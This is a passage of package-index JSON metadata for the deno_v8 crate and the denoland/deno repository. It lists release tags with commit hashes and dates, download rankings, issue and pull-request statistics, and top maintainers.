d":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-31T09:36:56.177Z","dependent_packages_count":0,"downloads":38115,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":89.07368341746403,"dependent_repos_count":12.890314763135011,"dependent_packages_count":17.026152305552852,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":39.66338349538396},"purl":"pkg:cargo/deno_v8","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_v8","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_v8","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_v8/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T04:05:42.345Z","issues_count":6636,"pull_requests_count":9651,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":583,"issue_authors_count":2480,"avg_comments_per_issue":2.5051235684147075,"avg_comments_per_pull_request":0.7197181639208372,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1410952.7079646017,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":226,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":186,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.232488822652757,"past_year_avg_comments_per_pull_request":1.1123128119800334,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issu